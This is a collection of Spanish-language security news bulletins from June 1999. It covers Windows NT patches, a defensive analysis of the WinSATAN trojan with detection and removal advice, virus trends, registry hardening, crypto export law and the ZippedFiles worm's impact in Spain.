miércoles, 30 de junio de 1999

Más seguridad en las especificaciones html

Una renovación en las especificaciones http/1.1 permiten un mayor
grado de seguridad. Para ello se aumentan las defensas del servidor
web y reducen las cargas por el cifrado.
La Internet Engineering Task Force ha publicado la última versión
de las especificaciones http/1.1, que incluye interesantes novedades
en el apartado referente a Message Digest Authentication. Esta nueva
tecnología permite proteger los servidores web con el algoritmo MD5
de la RSA. De esta forma se consigue asegurar que las passwords, que
pueden ser robadas por los hackers mediante sniffers, no sean
descifradas.

La Autentificación también permitirá a los administradores ser más
selectivos en el uso del cifrado, así como habilitar las herramientas
necesarias para limitar las sesiones SSL (Secure Sockets Layer) a
los datos que realmente precisen de su utilización. Esto reporta
una gran ventaja, ya que se consiguen ahorrar recursos del servidor
al emplear menos carga del procesador, ya que las conexiones SSL
consumen una gran cantidad de recursos.

Hewlett-Packard pionero en instaurar estas especificaciones en su
gama de productos, ya incorpora esta autentificación en su línea de
impresoras para Internet. Por su parte, Microsoft también soporta
esta tecnología en Internet Explorer 5.0. Todo parece indicar que
el único freno a la implantación total de esta nueva medida de
seguridad será el soporte para todos los navegadores y servidores.

Message Digest Authentication fue creado hace más de dos años, pero
la IETF ha añadido nuevas medidas que facilitan su implementación.
Las especificaciones no cifran el tráfico, pero establecen los
medios para esconder las passwords.

Más información:
http://www.zdnet.com/zdnn/stories/news/0,4586,408287,00.html
http://www.ietf.org/



Antonio Ropero



martes, 29 de junio de 1999

Tres años de virus para Windows9x/NT

Están a punto de cumplirse los tres primeros años desde la
aparición de Bizatch (Win95.Boza según la nomenclatura CARO),
el primer virus del mundo para plataformas Windows de 32 bits
(Windows9x/NT), y parece que es hora de hacer recapitulaciones
y estudiar la expansión del fenómeno vírico en este nuevo
terreno.
Una nueva plataforma, un nuevo sistema operativo, ha traído como
consecuencia la desaparición de ciertos tipos clásicos de virus,
y la consiguiente llegada de sus sustitutos naturales. Además es
de vital importancia resaltar el hecho de que el cambio ha sido
un proceso progresivo y paulatino, una adaptación darwiniana a
los nuevos esquemas funcionales.

El cambio más radical ha sido el de la "defunción" de los famosos
virus de "boot", que no han sido capaces de encontrar su sitio en
Windows, a pesar de haber sido desde siempre números uno en las
listas de virus "in the wild" durante la etapa del DOS. El
progresivo relevo generacional lo tomaron los virus de macro,
que por su sencillez estructural y su carácter multiplataforma
han sido una auténtica mina para los escritores de virus que no
se manejaban en ensamblador. Dicen que en muchas ocasiones lo más
sencillo es lo que triunfa, y en el caso de los virus de macro
este dicho se ha hecho bueno: su progresión en cuanto a número
ha sido geométrica, y llevan copando, prácticamente desde sus
orígenes, los primeros puestos de las listas "in the wild".

Por su parte, los virus de fichero siguen siendo los más
"artísticos". Desde la aparición de Bizatch, el primero de la
saga, pasó algún tiempo hasta que empezó a darse un flujo normal
de producción de virus de estas características. En un principio
se trataba más bien de "virus de museo", y así se fueron
sucediendo especímenes como Mr.Klunky, Punch, Harry... el paso
definitivo de la experimentación a la funcionalidad vino de la
mano del escritor de virus peruano del grupo 29A, Jacky Qwerty,
el primero en abrir las puertas a los virus al mundo de la
compatibilidad Win32, y famoso por haber sido el pionero en
numerosas técnicas de programación, como la residencia por
proceso.

De esta manera se ha llegado, con el paso de los meses, a una
paulatina desaparición de los virus de fichero de DOS, que han
cedido el terreno a sus sucesores de Win32. Esto, por otra parte,
ha desembocado en una triple vertiente: en líneas generales, los
únicos virus de DOS de los que hemos tenido noticia en los últimos
meses están caracterizados por un alto nivel técnico, siendo el
Emperor el último ejemplo más significativo; por su parte, los
virus de Win32 en un principio comenzaron siendo extremadamente
"naïve", y no tuvieron que pasar muchos meses para que empezasen
a salir a la luz ejemplares de una gran complejidad técnica, de
la mano de aquellos escritores de virus experimentados en DOS
cuyo proceso de adaptación a Win32 fue un simple cambio de
hábitos de programación. Este doble carril ha venido siendo la
nota dominante del panorama Win32 hasta el último año
aproximadamente, época en la que la situación se ha normalizado,
trayendo como consecuencia la predominancia de virus de nivel
estándar para plataformas Win32.

Por otra parte, la versatilidad de Windows ha traído consigo la
aparición de nuevos tipos de virus hasta ahora desconocidos,
nuevas amenazas que, a pesar de haber sorprendido a propios y
extraños en el momento de su aparición, no han causado demasiados
quebraderos de cabeza a las casas antivirus. Entre los tipos de
virus de nueva generación más importantes cabría destacar los dos
grupos principales: I-Worms y virus de WSH. Mientras que los
segundos no parece que vayan a suponer una seria amenaza, a
pesar de ser capaces de infectar HTML y procesos VBS y JS, los
primeros están compitiendo en los últimos meses seriamente con
los virus de macro en la cabeza de las listas "in the wild".


Los I-Worms son los primeros resultados víricos de la amoldación
total a la integración a la red de los ordenadores por medio de
Windows: estos agentes infecciosos se limitan a infectar y/o
parchear únicamente lo imprescindible, y su mayor amenaza está
en su capacidad de reproducirse por medio de la red, o bien
valiéndose del e-mail, o bien de mensajes en newsgroups o
enviándose por FTP. En el último semestre hemos tenido ocasión
de oír acerca de las "andadas" de ejemplares de este tipo como
Parvovirus, Happy, PrettyPark o, en la última semana, Zipped_Files.
Aparte de éstos, otros dos virus, Melissa y Papa, de macro,
también coparon posiciones privilegiadas en los "top-ten" de
la ITW, llegando el primero hasta el punto de ver involucrado
al FBI en la detención de su autor, un escritor de virus
aparentemente desconocido en la escena.

En cualquier caso la rápida difusión "in the wild" no es algo
exclusivo de I-Worms y virus de macro: ahí están los ejemplos
de, en un principio, Marburg -que llegó a ser distribuido en el
CD de un simulador de vuelo y de la conocida revista de difusión
europea "PC Gamer"- y HPS, y, en una segunda etapa, el
extendidísimo CIH y el versátil Girigat, que ha llegado a
colapsar los sistemas administrativos del gobierno de Grecia.
Es curioso observar también que, mientras que Estados Unidos y
la Unión Europea se disputan el número de autorías de virus casi
por igual -con Sudamérica y Europa del Este a los talones-, un
gran número de las infecciones que se registran cada año tienen
su origen a lo largo de todo el continente asiático con especial
intensidad.

El futuro y la evolución son inciertas, aunque lo que parece
claro es que los virus tienden a ser cada vez más complejos,
debido a las exigencias de la nueva plataforma, y que el camino
está abierto hacia la integración con Internet. Los límites están
en la propia imaginación de los escritores de virus, y el único
freno que existe es el propio tiempo, que es el que va trayendo
consigo día a día las innovaciones en el terreno de Win32. La
duda está en si las compañías antivirus van a ser capaces de
seguir el ritmo frenético de la evolución vírica o si, por el
contrario, se verán finalmente desbordadas por la imaginación
del lado oscuro de la programación.


Giorgio Talvanti



lunes, 28 de junio de 1999

Nuevo parche de Microsoft para Windows NT Server

Microsoft ofrece un nuevo parche para cubrir una vulnerabilidades en los
sistemas Windows NT Server. El problema reside en una posible denegación
de denegación de servicios en el subsistema Win32 de Windows NT.
La primera de las vulnerabilidades afecta a a csrss.exe, el subsistema
Win32 de Windows NT. Csrss proporciona a Windows NT los servicios
necesarios para procesar la ejecución de clientes en la máquina local.
Cuando un cliente procesa una petición al servicio Win32, csrss genera
un hilo al servicio que realizó la petición. Si todos los hilos están
ocupados, la petición espera en una cola hasta que uno de los hilos
complete su trabajo y quede disponible.

La causa de la vulnerabilidad reside en la forma en que csrss maneja las
peticiones que requiere la entrada del usuario. Un hilo que necesite que
el usuario introduzca algún dato muestra un cuadro de diálogo y espera la
información necesaria, y permanece ocupado hasta que recibe los datos. Si
todos hilos en csrss están esperando la entrada de datos del usuario, no
pueden servir nuevas peticiones, lo que provoca que la máquina deje de
funcionar hasta que el usuario proporcione la entrada de datos. Una vez
que se recibe la entrada, el proceso vuelve a la normalidad.

No todas los Windows NT están afectados por la vulnerabilidad, tan solo
aquellos Windows NT Server que permiten que los usuarios normales
accedan a él de forma interactiva. Las normas elementales de seguridad
recomiendan que tan sólo los administradores entren en los servidores,
por lo que se supone que debe haber pocos afectados por el problema.

El parche modifica la forma en que csrss asigna los hilos. Si csrss va
a gastar su último hilo disponible, este no se empleará en servir a una
aplicación que requiera la entrada del usuario, sino que atenderá una
petición que no lo requiera.

Más información:
Boletín Microsoft: http://www.microsoft.com/security/bulletins/ms99-021.asp



Antonio Ropero



domingo, 27 de junio de 1999

WinSATAN, troyano descubierto por IP6

Julio César Hernández, Consultor de IP6 Seguridad, ha descubierto
un nuevo troyano que viene a sumarse a esta plaga que amenaza la
seguridad de los usuarios de Internet. De una forma resumida, nos indica en este informe los principales puntos de su análisis.
El troyano se presenta como una utilidad llamada WinSATAN, bajo
esta apariencia intenta engañar a la víctima y trata de pasar
desapercibido. El programa WinSATAN se supone que es "una versión
para Windows de la herramienta de auditoría de seguridad para Unixes SATAN". Lo cierto es que suena lo suficientemente
atractivo como para atraer a muchas víctimas potenciales. Aunque
el troyano ha sido descubierto bajo el programa WinSATAN, no
podemos descartar que utilice otros programas para difundirse.

El programa motivo de estudio se obtuvo en http://music.acmecity.com/orchestra/29/WinSATAN.zip.
Ninguna de las tres funcionalidades que la utilidad WinSATAN
realizaba a priori funcionó correctamente durante nuestras
pruebas. Esto podría ser un indicio de que, quizá, el programa
WinSATAN fue concebido exclusivamente para difundir el troyano.

Para instalar el troyano basta con ejecutar una única vez el
programa WinSATAN que, sigilosamente, instala un programa llamado
fs-backup.exe en el directorio c:\windows de la máquina de la
víctima. Además, añade una clave en el Registro, concretamente en
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run con el nombre, aparentemente inocente, de RegisterServiceBackup
que apunta hacia c:\windows\fs-backup.exe y que permite que éste
programa se ejecute cada vez que la máquina reinicia Windows.

La ejecución del troyano no deja ningún rastro ni en la barra de
tareas ni en el SystemTray, así mismo tampoco puede verse ejecutando un Ctrl+Alt+Del. Con la ayuda de herramientas como
Sniffit, tcpdump y un editor hexadecimal puede observarse que el
troyano, en cuanto se inicia, trata de conectarse a alguno de los
servidores de IRC que tiene predefinidos en su código, y que son:

irc.stealth.net
irc.webbernet.net
ircnet.sprynet.org
irc.univ-lyon.fr
irc.rus.uni.stuttgart.de
eu.ircnet.org
us.ircnet.org
web.im.tut.fi

El mensaje que envía al primero de estos servidores de IRC con que consigue conectarse es el siguiente: " Online!. I am . I use Windows
95, my CPU is an Intel Pentium ". Este mensaje es enviado, de
forma alternativa, a dos usuarios del servidor IRC que están casi
siempre conectados utilizando un Privmsg. Esos usuarios son
scroll y scroll1. No hace falta mencionar que esto expone de
manera muy seria a la máquina infectada a cualquier ataque que
el autor del troyano haya programado en su código, además de
ofrecerle a este un buen método para mantenerse en el anonimato.

Habría que dedicar quizá algo más de tiempo a hacer un debug completo del código para saber exactamente en qué consisten estas
amenazas. En cualquier caso, no parece aventurado adelantar
que el troyano es, potencialmente, muy peligroso: no tendría
demasiado sentido que su autor se hubiese tomado tantas molestias
sólo para conectar a sus víctimas al IRC.

El código del troyano está escrito en Delphi y utiliza algunas de las librerías de comunicaciones de FPiette. En principio, sólo
las máquinas Windows 3.x/95/98 pueden ser infectadas por el
troyano. Parece que hay un error en el código que impide que se ejecute correctamente en Windows NT 4.0 (o quizá, simplemente
no se pensó para esta plataforma). En concreto, no puede añadirse adecuadamente la key en el Registro.

Lo más sencillo para detectar el troyano en nuestro sistema es hacer un "netstat -an" desde el DOS y observar si en la lista de
conexiones hay alguna extraña a un servidor IRC (algo así
como 165.121.1.47:6667). Si eso ocurre (y no estamos usando un cliente de IRC como mIRC, claro) podemos sospechar de que somos
víctimas de WinSATAN. Una buena estrategia es, también, buscar
un ejecutable en C:\windows llamado fs-backup.exe (algo así como
366 Kbs), que podría ser también indicativo de la infección.

Otra opción, es comprobar la clave del Registro anteriormente
comentada para ver si tenemos alguna entrada innecesaria. Esta
clave es muy usada por los diferentes troyanos que pululan por la
red, así que nunca está de más. En nuestro caso concreto, como ya
hemos comentado antes, hay que buscar una entrada llamada
RegisterServiceBackup que apunta a c:\windows\fs-backup.exe.

En caso de ser víctimas del troyano, su desinfección se presenta muy fácil. Bastará con borrar el archivo fs-backup.exe que está en
c:\windows. Si se tiene dificultades al borrarlo porque está en
ejecución, lo más rápido es salir de Windows indicando que queremos reiniciar en modo MS-DOS. Así, el archivo no estará en
ejecución y podremos borrarlo sin ningún tipo de impedimentos. Lo
único que nos queda por borrar es la entrada del Registry que
hacía que se reiniciara cada vez que arranca Windows.


Julio César Hernández
http://www.ip6seguridad.com



sábado, 26 de junio de 1999

Alertas a intrusos en sistemas gubernamentales americanos

El Departamento de Energía norteamericano recomienda tomar medidas en la
configuración de los ordenadores, con el fin de un posterior seguimiento
y establecimiento de acciones legales contra intrusos.
Cuando un usuario, tanto autorizado como no autorizado, intente entrar
dentro de un sistema gubernamental, deberá aparecer un mensaje que tendrá
que recoger una serie de requisitos relacionados con su utilización.

En primer lugar se deberá informar al usuario sobre los límites
establecidos en el sistema, y la utilización que de este se podrá
realizar sin incumplir las reglas previamente establecidas. Seguidamente,
se deberá avisar a los usuarios que todos sus movimientos dentro del
sistema están siendo monitorizados, con el fin de tomar medidas en el
caso de una mala utilización del mismo.

Por último, una advertencia clara de que salir del sistema una vez que
el usuario haya accedido a un recurso no autorizado, aunque no se realice
ninguna acción, no exime de persecución judicial. Y a que el hecho de una
entrada no autorizada es ilegal.

Estas advertencias deberán ser visibles claramente a cualquier usuario
antes de la petición por parte del sistema del login tanto en utilización
de telnet, ftp o http.

Para facilitar la introducción del código necesario, el CIAC a puesto a
disposición de los administradores todo lo necesario para las plataformas
Macintosh, Windows NT, Windows 95, 98 Windows 3.11, DOS, y sistemas UNIX.

Más información:
www.ciac.org
ciac.llnl.gov
ftp.ciac.org



Antonio Román



viernes, 25 de junio de 1999

46 errores en el Pentium III

El procesador Pentium III, la más potente y reciente creación de Intel no
se libra de los bugs. La propia Intel reconoce la existencia de 46 errores
en su microcódigo.
Según la nomenclatura de Intel no hemos de hablar de fallos, ni tan
siquiera de bugs, la multinacional del chip prefiere llamarlos erratas.
En un documento en formato pdf publicado por la empresa se reconoce la
existencia de 46 de estas "erratas", aunque al mismo tiempo, presenta
poco interés en solucionarlos debido principalmente a que son calificados
como problemas menores.

Entre las 46 erratas, se encuentra problemas de cálculos, saltos, etc. que
pueden provocar cuelgues, ejecuciones incontroladas, etc. Por ejemplo, el
listado como número 17, indica que una llamada CALL a ESP, puede causar un
salto a una dirección EIP inesperada.

Otro error esta asociado al puntero FP, por el cual, bajo determinadas
circunstancias, un sistema operativo de 32 bits, se puede producir errores
al trabajar con operaciones en coma flotante de 16 bits. También se han
encontrado diferencias entre los informes de depuración de versiones
anteriores de procesadores Intel y los producidos con un Pentium III.

Más información:
ftp://download.intel.nl/design/pentiumiii/specupdt/24445304.pdf



Antonio Ropero



jueves, 24 de junio de 1999

Ataque contra sistemas NT a través del servicio LSA

Microsoft ha publicado un parche para eliminar una vulnerabilidad
que posibilita un ataque de denegación de servicio contra Windows
NT Server o Workstation a través del servicio Local LSA (Local
Security Authority).
Una petición mal construida contra el servicio LSA o Local Security
Authority (Autoridad de Seguridad Local), puede provocar que el
servicio deje de responder, por lo que hace falta reiniciar el
ordenador para que este funcione correctamente de nuevo.

Windows NT proporciona la posibilidad de administrar los privilegios
de usuario de forma automática a través de la API Local Server
Authority. Esta API permite a los programas interrogar por nombres
de usuario, modificar privilegios, y cambiar otros elementos de la
política de seguridad. Todo ello, de acuerdo a las autorizaciones
del programa.

Determinados métodos de la API no tratan adecuadamente determinados
tipos de argumentos incorrectos. La vulnerabilidad sólo representa
un riesgo de denegación de servicios, y el servicio LSA puede ser
reiniciado con resetear el ordenador. Microsoft asegura en su
boletín, que no existe posibilidad de emplear esta vulnerabilidad
para obtener un acceso no autorizado al sistema.

Aunque, según la compañía de Bill Gates, no existen avisos de
usuarios afectados, Microsoft proporciona el parche para tomar las
medidas adecuadas para proteger los sistemas contra este ataque.
Las versiones afectadas, son los Windows NT 4.0, en las versiones
Server, Workstation y Terminal Server.

Como siempre, Microsoft recomienda a los administradores que evalúen
el grado de riesgo con que la vulnerabilidad afecta a sus sistemas
y determinen la necesidad de instalar el parche.

Más información:
Microsoft Knowledge Base: http://support.microsoft.com/support/kb/articles/q231/4/57.asp
Boletín de Microsoft: http://www.microsoft.com/security/bulletins/ms99-020.asp
Parche: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP5/LSA3-fix/



Antonio Ropero



miércoles, 23 de junio de 1999

Pasos hacia la firma electrónica

Tras el éxito de los ensayos realizados de la utilización de
certificados digitales en la declaración de la renta a través
de Internet, el Ministro de Fomento, Rafael Arias-Salgado
informó del estudio en el próximo consejo de ministros de lo
que se prevé sea la futura ley sobre firma electrónica. Esta
firma será la que en un futuro no muy lejano nos permita
realizar transacciones y gestiones utilizando Internet.
Esta firma electrónica tendrá el aspecto físico de una
tarjeta, como las de crédito que se utilizan en la actualidad,
en la que irán nuestros datos y los de la entidad que certifica
la firma. Para la utilización de las tarjetas necesitaremos
un periférico que en la actualidad puede valer entre 5.000
y 7.000 pesetas, y la utilización será similar al de las
tarjetas de crédito.

Con la realización de este proyecto de ley, España aspira
a servir de base para las directivas que en un futuro se
apliquen en los países de la UE. Las normas básicas a seguir
en este tipo de directivas se ratificarán a finales de este
año, lo que da margen a pensar que puede ser posible que el
proyecto español sea modificado.

Aunque en un principio, cualquiera puede ser entidad
certificadora, lo que sí está claro, es que habrá un
requisito muy importante, el económico. Ya hay varias
entidades certificadoras en la actualidad en España, la
creada con la colaboración entre la Fábrica Nacional de
Moneda y Timbre y Correos y Telégrafos y los notarios, que
con el fin de seguir prestando el servicio de certificación
en Internet han creado una propia. Cualquier empresa de la
Unión Europea podrá emitir certificados digitales en
cualquier país de la misma.

Utilización de los certificados digitales:
Cuando uno de los usuarios comunica a otro su certificado,
en esta misma comunicación también indica la Entidad de
Certificación utilizada por este, la llave pública de la
entidad certificadora debe ser conocida previamente por
todos los comunicantes. Esta llave pública, se puede obtener
mediante la utilización de servidores de llaves públicas como
el que en la actualidad está en funcionamiento en HispaSec.

Más información:

http://www.feste.com/
http://www.fnmt.es
http://www.correos.es
http://www.el-mundo.es/navegante/diario/99/junio/19/firma.html



Antonio Román



martes, 22 de junio de 1999

Cómo comprar de forma inteligente en Internet

Cada día surjen nuevos sitios en Internet que facilitan la adquisición
de todo tipo de objetos o servicios, pero antes de realizar la compra
conviene tener claro que tipo de información se da al vendedor y a través
de que canales.
Nunca deberías suministrar información confidencial por Internet sin
ningún tipo de protección, especialmente en lo que se refiere a datos
financieros. Si está pensando en comprar vía web ese libro raro o esa
colección de discos que sólo encuentra en una tienda en línea, pero
dudas a la hora de suministrar tu número de tarjeta de crédito, has de
saber cuáles son las opciones que se te presentan a la hora de hacerlo
de forma segura.

- No entregues más información que la estrictamente necesaria para
recibir el producto que has comprado (normalmente no existe motivo
para que debas responder con tu renta anual o tus ideas religiosas).

- Nunca entregues datos confidenciales si no es a través de un
servidor seguro (que utilice SSL).

- No envíes tu número de tarjeta de crédito por correo electrónico.

- Comprueba rutinariamente los certificados de los sitios seguros a
los que te conectas. De nada sirve SSL si no se lo toma en serio.

- Reclama tus derechos como consumidor:

- Exige imágenes del producto que piensas adquirir, al menos cuando
sea relevante.

- Exige información detallada y clara sobre los precios.

- Exige información sobre la forma de envío y coste adicional.

- Exige que te expliquen las condiciones de garantía y devolución.

- Busca la página sobre política de privacidad del comercio, para
saber qué se hace con tu información privada, tanto la recopilada
directamente, suministrada al rellenar formularios, como la obtenida
indirectamente por tu navegación. Si no la encuentras, exígela.

- No pagues en efectivo, ni con cheque, ni con tarjeta de débito,
mejor hazlo con tarjeta de crédito. Es más seguro de lo que
generalmente se cree y te ocasionará menos problemas en caso de
irregularidades con la entrega de tu compra o fraude con tu tarjeta.
Consulta con tu banco las condiciones de resolución de disputas con el
comerciante. La entidad financiera de medios de pago te respalda. En
caso de fraude, el que tendrá problemas será el comercio en el que se
hizo la compra con tu tarjeta, y no tú.


Gonzalo Álvarez Marañón
criptonomicon@iec.csic.es
Boletín Criptonomicón #51
http://www.iec.csic.es/criptonomicon



lunes, 21 de junio de 1999

EE.UU. aprueba el proyecto de ley sobre exportación de criptografía

Tras la aprobación la semana pasada de este proyecto de ley por parte
del Subcomité de Telecomunicaciones Comercio y Protección al Consumidor
del Congreso de los Estados Unidos, la postura norteamericana en cuanto
a la exportación de los algoritmos de encriptación de 128 bits, se hace
más flexible.
Según afirma Tom Biley, presidente del mencionado Subcomité, el nuevo
proyecto de ley vendrá a dar cobertura legal a la exportación que se
viene haciendo en la actualidad mediante otras compañías en el
extranjero. Esto abre una esperanza a la comunidad internauta para,
en un futuro no muy lejano, poder tener acceso a software tan necesario
hoy en día como los navegadores Microsot Internet Explorer o Netscape
Communicator en versiones de 128 bits. Ya que para sus versiones fuera
de Norteamérica utilizan un algoritmo de encriptación de 40 bits.

Este proyecto denominado ley H.R. 850 ya ha sido aprobado por el
Subcomité, pero aún es necesaria la aprobación del Comité competente.
Aunque en este caso, es algo que parece estar superado ya que el
proyecto de ley fue aprobado por unanimidad de todos los comisionados.

Esta ley esta concebida con la finalidad de dar una mayor seguridad
a los usuarios. De esta forma, permitirá utilizar sistemas de pago
seguros en Internet y así dar un empuje a todo el sistema de comercio
electrónico.

Lo que cubre de dudas a este proyecto es la petición que en él se hace
para que la Secretaría de Comercio de Estados Unidos ponga todos los
medios para que se garantice la no-exportación de productos que posean
algoritmos de encriptación de 128 bits. Con esta medida, parece que
vuelven a resurgir las paranoias de los Estados Unidos, que temen que
la exportación de estos productos pondría en peligro la seguridad del
país, al poder ser utilizado por grupos con actividades antiamericanas.

Más información:
Comité de comercio, nota de prensa
Comité de comercio, nota de prensa
Comité de comercio



Antonio Román



domingo, 20 de junio de 1999

Microsoft soluciona el problema del Information Server

El problema de sobrecarga de buffer en Internet Information Server 4.0
ha sido, sin lugar a dudas, la noticia de la semana. Este bug, que
posibilita desde la denegación de servicios hasta la ejecución remota
de código, vuelve a ser noticia por la publicación del parche de
Microsoft para solucionar el fallo.
Microsoft dio una solución temporal que permitía eliminar el problema,
pero deshabilitaba la opción de cambio de contraseñas vía web por parte
de los usuarios. Esto podía crear problemas a los usuarios, debido a que
sus contraseñas podían caducar y no tenían posibilidad de renovación.
Para evitar el problema Microsoft pone a disposición de todos los
administradores un parche con el que quedará solucionado.
Se puede encontrar el nuevo parche en la dirección:

ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/ext-arregle/

Este parche se une al publicado por eEye Digital Security Team que fueron
los que en su momento descubrieron la vulnerabilidad dentro de IIS 4.0.
Microsoft criticó el proceder del grupo, cuando dieron a conocer el
problema, junto con el exploit que aprovechaba el fallo, para obtener
control total de la máquina atacada.

Aunque en un principio eEye indicó que la sobrecarga de buffer se
realizaba a través de los ficheros htr, Microsoft informa que también
son vulnerables los archivos .idc y .stm. Las dlls afectadas son ism.dll,
ssinc.dll y httpodbc.dll, si alguna de estas librerías está presente en
el sistema, este es potencialmente vulnerable. Por lo que es altamente
recomendable la instalación del parche de Microsoft.

Más información:
Hispasec
Hispasec
Parche de eEye
Aviso de eEye
Boletín de Microsoft
Aviso del CERT
CNet



Antonio Román



sábado, 19 de junio de 1999

Configuración segura del Registro en Windows NT

El Registro de NT es un arma muy poderosa, por lo normal olvidada, para
poder configurar correctamente nuestra máquina. En HispaSec vamos a dar
algunos ejemplos de como unas sencillas modificaciones permiten aumentar
la seguridad de nuestros sistemas.
Una política de seguridad que englobe el factor humano, una actualización
constante de los parches, un seguimiento diario de las noticias sobre los
nuevos riesgos, y una buena configuración de los sistemas, son pilares
básicos a la hora de proveer un entorno seguro.

Cuando hablamos de configuración del sistema en Windows NT, debemos de
tener una especial atención, entre otras, a la administración de las
cuentas de usuarios, la seguridad de los recursos, los permisos de los
archivos y directorios, los logs para auditorias, o las relaciones de
confianzas. Sin duda podremos acudir a la extensa bibliografía existente
para encontrar cumplida información sobre éstas y otras características
del sistema de Microsoft.

Sin embargo, suele ser habitual olvidar, o dejar en un segundo plano,
los valores del Registro, herramienta fundamental a la hora de poder
configurar determinados controles de seguridad.

Debemos de pensar en el Registro de NT con una base de datos donde tienen
cabida los parámetros de configuración de nuestro sistema, similar en
parte a lo que se recogía en los ficheros .ini de otras versiones de
Windows. NT permite interactuar con estos valores a través de las
distintas herramientas de configuración del sistema. No obstante, quedan
aun múltiples parámetros a los que sólo se podrá llegar a través del
acceso directo mediante el editor de Registro: regedt32.exe.

Es obligación por nuestra parte recomendar un especial cuidado a la
hora de trabajar directamente con el editor de Registro, ya que una
introducción de valores erróneos puede acarrear diversos problemas al
sistema. El entorno ideal para estos casos sería contar con una máquina
de pruebas, y tras comprobar que no existen problemas, proceder a la
modificación del Registro en el resto de sistemas.

Veamos a continuación algunos parámetros modificables, a través de la
aplicación regedt32.exe, que pueden ayudarnos para poder crear un entorno
más seguro en Windows NT.

-Ruta: HKLM\SOFTWARE\Microsoft\WindowsNT\Current\Version\Winlogon
Variable: DontDisplayLastUserName
Valor: 1

Esta modificación, DontDisplayLastUserName=1, evitará que el sistema
muestre en la ventana de autentificación el nombre del último usuario.
De sobra es conocido que los nombres de usuarios son pieza codiciada por
los crackers, a la hora de poder proceder a distintos tipos de ataque,
como el de fuerza bruta. Es por ello que además de esta modificación,
recomendamos renombrar las cuentas de usuarios que vienen por defecto en
Windows NT, como pueda ser la del Administrador.

-Ruta: HKLM\SYSTEM\CurrentControlSet\Control\SessionManager\MemoryManagement
Variable: ClearPageFileAtShutdoen
Valor: 1

Con este valor conseguiremos que el archivo que almacena la memoria
virtual del sistema se borre automáticamente tras salir de una sesión.
Esta característica evitará que un posible atacante accediera a este
archivo y recogiera información confidencial.

-Ruta: HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
Variable: AllocateFloppies
Valor: 1

-Ruta: HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
Variable: AllocateCDROMS
Valor: 1

Con estás dos entradas se consigue desactivar las disqueteras y las
unidades de CD-ROM respectivamente. En determinados entornos se aconseja
esta práctica, para impedir la grabación de datos, o la ejecución e
instalación de software. Sin olvidar que también suelen ser entrada
habitual de los virus informáticos.

Estos son sólo algunos ejemplos de la potencia que puede suministrar el
uso directo del Editor de Registro. En sucesivas entregas seguiremos
comentando otras entradas y configuraciones que nos ayudarán a conseguir
un entorno NT más seguro. Así mismo, extenderemos estas recomendaciones
a otros sistemas mayoritarios, como puede ser Linux.


Bernardo Quintero



viernes, 18 de junio de 1999

Incidencias de ZippedFiles en España

Mucho se ha hablado de ZippedFiles en los pasados días, el famoso
gusano que con unas asombrosas capacidades de reproducción en redes
locales afectó a grandes corporaciones de todo el mundo. En HispaSec
tratamos de analizar las incidencias del gusano en nuestro propio
país, que sin duda interesarán mucho más que los posibles afectados
fuera de nuestras fronteras.
En HispaSec nos hemos puesto en contacto con todas las firmas de
antivirus que se comercializan en nuestro país, que nos han ofrecido
toda la información sobre las incidencias de este virus en España.
Como conclusión, podemos decir que las incidencias y usuarios
afectados han sido mucho menores de lo que en un principio se
podía llegar a esperar. Todos los antivirus reaccionaron rápidamente
y a las pocas horas del primer aviso ya disponían de actualizaciones
para sus productos. En todos los casos nos han comentado que sin
duda el virus que más problemas ha dado a los usuarios ha sido el
CIH, del cual si han sido numerosas las incidencias y los usuarios
afectados.

Inprova (http://www.avp-es.com) distribuidor oficial de AVP en
España nos informa que ninguno de sus usuarios les ha alertado
sobre este gusano, ya que el mismo día 10, 5 horas antes de la
aparición del boletín, se había enviado la actualización del
antivirus. Por su parte, MCM (http://www.mcmes.com) también
distribuidores de AVP en nuestro país, nos comenta que las
incidencias han sido mínimas sin llegar a diez los realmente
infectados. También nos comenta que «la susceptibilidad de algunos
haga creer al usuario que pueden tener este virus por "pérdida"
de ficheros DOC, cuando ha sido en varios casos el ETHANA que les
ha cambiado el nombre al fichero».

MCM nos ha facilitado también el comentario de Eugene Kaspersky
según el cual son muchos los reportes que recibe mundialmente, y
que en empresas importantes la propagación dentro de sus redes
empieza a ser elevada. El propio Kaspersky teme una gran
propagación de ZippedFiles, según MCM todavía es pronto para
augurar la proliferación de este gusano.

Panda Software (http://www.pandasoftware.es) nos comenta que los
ordenadores infectados se pueden cifrar en unos 4.000. Según la
multinacional española «la razón de tal incidencia se debe a que
la mayoría de los afectados son corporativos y a que en Estados
Unidos y Europa hubo muchas incidencias (en general) en empresas
multinacionales. La mayoría de las incidencias han venido de
usuarios y corporaciones que no son clientes de Panda».

Sinutec (http://www.sinutec.com), distribuidores del antivirus
Sophos, nos ha comentado que en el caso del ExploreZip, tuvieron
unas 15 llamadas solicitando la recuperación, en todos los casos
se efectuaron las recuperaciones empleando Recuperación remota.

Network Associates (http://www.nai.com/spain) por su parte nos
informa que recibieron las primeras noticias acerca de la aparición
de W32/ExploreZip.worm el 9 de Junio, vía SecureCast -de Network
Associates- acompañadas de una explicación del funcionamiento del
virus y un fichero 'extra.dat' que permitía la detección del citado
virus. En nuestro país tuvieron unas 200 llamadas, la mayor parte
de ellas, solo precisaban información acerca del gusano. Según nos
informan «la mayoría de los clientes corporativos, que utilizan
SecureCast como herramienta de actualización y recepción de alertas
antivirus, recibieron la actualización automáticamente, estando
protegidos incluso antes de que tuviesen noticias de la aparición
del virus».

Desde NeT Security Solutions, distribuidores de Command Antivirus
(http://www.commandcom.com) nos comentan que no han tenido ninguna
incidencia por este virus en España, si bien tienen conocimiento de
alguna multinacional importante que si ha tenido problemas.

Los usuarios de SC2 (http://www.sc2.com) distribuidores de los
productos de Norman en España tampoco han sufrido ninguna
incidencia. Si bien, desde la central internacional de estos
productos (http://www.norman.com), nos informan que una sucursal
en Perú de una importante empresa de telecomunicaciones española,
no disponía de ningún producto antivirus es sus instalaciones y
sufrió el ataque de ZippedFiles.

La situación en Codine (http://www.codine.com), distribuidores de
F-Secure, ha sido similar a los anteriores, ninguna incidencia por
parte de sus usuarios. También nos comentan que en toda Europa,
salvo Inglaterra, la situación es bastante similar.

En todos los casos las incidencias en nuestro país han sido nulas
